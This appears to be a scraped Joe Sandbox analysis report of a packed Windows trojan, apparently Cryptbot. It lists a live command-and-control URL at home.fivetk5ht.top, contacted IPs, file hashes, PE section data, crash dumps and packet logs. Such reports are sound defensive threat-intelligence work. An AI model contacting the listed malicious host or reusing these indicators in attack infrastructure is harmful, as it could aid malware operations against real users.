                              http://.jpgiuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.121.15.192
                                  		home.fivetk5ht.topSpain
                                  		207046REDSERVICIOESfalse
                                  98.85.100.80
                                  		httpbin.orgUnited States
                                  		11351TWC-11351-NORTHEASTUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578958
                                  Start date and time:2024-12-20 17:04:49 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:iuO4kwUi17.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:a7e8135cfe118aa459fe0483617fd64e.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@2/5@10/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 20.190.147.11
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: iuO4kwUi17.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:06:03API Interceptor3x Sleep call for process: iuO4kwUi17.exe modified
                                  11:06:42API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.192nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  home.fivetk5ht.topnojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  httpbin.orgnojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • 34.226.108.155
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • 98.85.100.80
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • 34.226.108.155
                                  EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • 98.85.100.80
                                  oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                  • 34.226.108.155
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                  • 34.226.108.155
                                  f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                  • 34.226.108.155

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TWC-11351-NORTHEASTUSQnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • 98.85.100.80
                                  EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • 98.85.100.80
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                  • 98.85.100.80
                                  REDSERVICIOESnojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_iuO4kwUi17.exe_136e190f9b7616bd02a794927c2a1cf65559bb7_ada84c93_360cd2ee-491d-4ed1-bcaf-52d0da5d12c5\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9413483103345184
                                  Encrypted:false
                                  SSDEEP:96:BvFNzKUtsF2hIGhpJfZQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1oVazW0dPtP:ZG8A0BU/Aju0ZrPMtwzuiFyZ24IO8O
                                  MD5:D29B25B4A684A4628BEEF3F397FF5058
                                  SHA1:9F51A5C6CFF88B2EAD1526E2F7BF99B7051BE3CD
                                  SHA-256:14214E1B68811A53641F6584A195FCBD2702B7EB2531EAC424181A9C82B304FD
                                  SHA-512:725D2EED9DF7729E2A9439ECA021B7580F574C98758757EE9744A9892C4BE70C9C0AE9C131A04E5D334C83D3A22BE4D8FEA989150BF281321D08AB4AF3E5F909
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.4.3.6.9.5.3.9.1.9.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.4.3.7.1.0.7.0.4.4.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.0.c.d.2.e.e.-.4.9.1.d.-.4.e.d.1.-.b.c.a.f.-.5.2.d.0.d.a.5.d.1.2.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.4.6.e.8.f.0.-.3.2.a.f.-.4.f.7.c.-.a.e.2.f.-.3.c.d.4.c.b.3.7.b.9.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.u.O.4.k.w.U.i.1.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.3.-.1.3.6.a.-.f.3.0.c.f.9.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.0.a.3.4.b.f.f.e.5.0.4.3.2.3.a.2.5.2.9.7.3.5.3.4.e.0.4.6.f.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.0.3.5.0.9.b.6.b.6.a.9.e.1.5.8.b.c.7.a.6.a.e.8.9.f.2.1.f.0.0.5.7.e.5.1.1.5.e.c.d.!.i.u.O.4.k.w.U.i.1.7...e.x.e.....T.a.r.g.e.t.A.p.p.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4184.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 16:06:10 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):213692
                                  Entropy (8bit):1.4358183529907513
                                  Encrypted:false
                                  SSDEEP:384:jATL/zrEqwXm9tY1jn/3HivzJSJe5OG5tYVWZB/iy7qqhj3YGeE3:+L/zrEqVAlnPHUzuSOG5tYWBKmLYjS
                                  MD5:BF11BF4D759C5493D8D6B20827335F30
                                  SHA1:5071F2CCA767ADCE25D726A1273933D3DC5A991A
                                  SHA-256:2CE375105A8CB4BD49F4AE274FE73911B24096C484CF39159C1C2B09A02A1380
                                  SHA-512:310EAC102F418EADE20C9C3B1BD3DD2E3278B6956F29ED9107B8F7DE7F31F71D99496776AB71936BFC4C33286976C1431695DBA50B945B12C6CC11D9248C9991
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP..a..... ........eg............t...........D................ ......d....}..........`.......8...........T............,..$...........P!..........<#..............................................................................eJ.......#......GenuineIntel............T.......p....eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4628.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8354
                                  Entropy (8bit):3.697485304627131
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJtE6g6YWRSU9Ogmfkb+WprW89bXlsf79m:R6lXJ+6g6YwSU9Ogmfkb7X+fM
                                  MD5:0BAA1A04369FBF1B653D450F57E6D8C5
                                  SHA1:DE2C8717177AA7C9BA5E36A85CFF4A32A0F5B88A
                                  SHA-256:3C2535585526B2F9EBCAFA2F01F85460F416C675EA3A4740A11FCC7E2D503FC7
                                  SHA-512:A3A13C1A013973EBF8F365FEABCF27F49C720B05C0664615DFC019DD35808EFFFFCE30895ED8A9F50CE1985F9B73D3DFD5BA3F041107C013052FDB93DE5340D2
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER46E5.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4594
                                  Entropy (8bit):4.469877622454593
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsdJg77aI9dKWpW8VYxYm8M4JcAL5FTj+q8RUkaTzzvzEd:uIjf3I7Dr7VxJcAvMdaTzzvzEd
                                  MD5:77E79CD785E75739F6852BE5A6B65F01
                                  SHA1:613D56D85DF1FE3ED5DE7F0CEB9B24BCD8ACA036
                                  SHA-256:C5FDC820BBA647D12BC57FF8AD03E758D2A640B399C8B73904789087EB64B110
                                  SHA-512:916B89430172E1F100D13B98265C69A3E02E15A998DFD38D31A0B0AE48B683CC1A713C296CEEE8B3567CF33CA1567276F503A157A16007C385212970E8EA7354
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639788" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.295977627166649
                                  Encrypted:false
                                  SSDEEP:6144:B41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+BrmBMZJh1Vj7:21/YCW2AoQ0NinrwMHrVP
                                  MD5:C3AEC0B4CB75D46F8D4F8A56A5294B94
                                  SHA1:AA6F5988247425AB9127B381B9E7C6E5972AA70F
                                  SHA-256:8A142314334BF177544F48B166AF439F68874EF012D9EBC130BEAF681BC74C4A
                                  SHA-512:3355451A2B57679837BA786254BF695C6B1415A2350EE9AFB04893BEB35CE7C94C456DBF6D5AB47EDBDC5303EA9A0319FA833F8E724A015F9C27A4AD5C5AC094
                                  Malicious:false
                                  Reputation:low
                                  Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..1..R................................................................................................................................................................................................................................................................................................................................................%!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.985742216127058
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:iuO4kwUi17.exe
                                  File size:4'480'000 bytes
                                  MD5:a7e8135cfe118aa459fe0483617fd64e
                                  SHA1:03509b6b6a9e158bc7a6ae89f21f0057e5115ecd
                                  SHA256:97f25927cea71bfcdac5e7755682aea36429ea3eb3accfc64ecdfc9db1d8006b
                                  SHA512:c2245cad2cac25e27c0b3e4a198e6d6a51f9f7f6b1e6fbf415ced7b8630956c985dfea7a2493fd03a532a3acc2f5238edcf68789d7387f9291461e7450cf44de
                                  SSDEEP:98304:giDWNEXknXg6uZL21BrRDjEMbNkehTQ4DURbaUOj:ovfCEvtQpOj
                                  TLSH:C92633B63D78FD4AD34828B5870C4F1A46FB18889DEAFB959CF4ADD55BC2042B30D162
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@.................................~DE...@... ............................

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0x1099000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F9308B2A68Ah

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc971e80x10lvvpaogd
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0xc971980x18lvvpaogd
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x7450000x284c00ad72b901e60c808fedb8d0753677fc6dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x7460000x1ac0x20056f133aca40f5e243fb6573abe811775False0.578125data4.52213224511641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x7480000x3920000x200018b880a1061fd93f4282364f36ced6bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  lvvpaogd0xada0000x1be0000x1bd400137215bfa86c1076147068ef91167d03False0.994559543444694data7.956161259145636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  aoltjaey0xc980000x10000x400d1964faf8532c051aa769e9f1eb73ce5False0.7197265625data5.874911030800955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0xc990000x30000x2200daa5bada12478354dc6607fdc70a5226False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_MANIFEST0xc971f80x152ASCII text, with CRLF line terminators0.6479289940828402

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 20, 2024 17:05:59.399806976 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:05:59.399862051 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:05:59.399967909 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:05:59.416958094 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:05:59.416999102 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.158593893 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.159215927 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.159272909 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.160801888 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.160871029 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.162305117 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.162400007 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.172708988 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.172728062 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.214236975 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.908050060 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.908195972 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:01.908493996 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.919009924 CET49703443192.168.2.1098.85.100.80
                                  Dec 20, 2024 17:06:01.919073105 CET4434970398.85.100.80192.168.2.10
                                  Dec 20, 2024 17:06:03.186801910 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.306499004 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.306881905 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.307826996 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.427653074 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427673101 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427711010 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427722931 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427750111 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.427808046 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.427839041 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427942991 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427957058 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.427998066 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.428021908 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.428035021 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.428046942 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.428086042 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.549134970 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549154043 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549177885 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549190998 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549232006 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549251080 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.549257994 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.549324036 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.550004959 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.550355911 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.714473963 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.714605093 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:03.878959894 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:03.879125118 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.050470114 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.050539017 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.270466089 CET8049704185.121.15.192192.168.2.10
